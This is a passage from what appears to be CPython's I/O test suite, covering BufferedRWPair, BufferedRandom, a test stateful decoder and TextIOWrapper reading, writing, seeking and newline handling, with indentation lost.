'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
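# With interleaved one-byte writes and reads, each write overwrites the
# byte at the current position and each read consumes the next one, so
# positions 0, 2, 4 and 6 end up as '1', '2', '3', '4' while 'b', 'd',
# 'f' and 'h' are read back, hence the expected b'1b2d3f4h' below.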
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated (variable length).
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
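# Worked example (for illustration): immediately after reset(), i == o == 1,
# so getstate() packs the flags as (1 ^ 1) * 100 + (1 ^ 1) == 0 and returns
# (b'', 0); setstate((b'', 0)) applies the same XOR and restores i == o == 1.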
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
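# Worked trace (for illustration, matching the 'i.o6.x.xyz.toolongtofit.'
# test case below): with o == 6, process_word() on buffer b'xyz' builds
# 'xyz' + '------', truncates it to 'xyz---' and appends the terminating
# period, giving 'xyz---.'.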
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the decoder defined above for testing.
# It is disabled by default; tests enable it when needed.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# Try to get a user-preferred encoding different from the current
# locale encoding, to check that TextIOWrapper() uses the current
# locale encoding and not the user-preferred encoding.
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
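# tell() is expected to fail inside the loop: while iterating,
# TextIOWrapper uses a read-ahead snapshot and disables tell() until the
# iterator is exhausted, after which it reports p2 again (checked right
# after the loop).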
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
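# The prefix is two bytes short of a chunk, so the three-byte UTF-8
# encoding of '\u8888' is split across the wrapper's internal read
# chunks; tell() after reading the prefix must still report a usable
# position.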
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
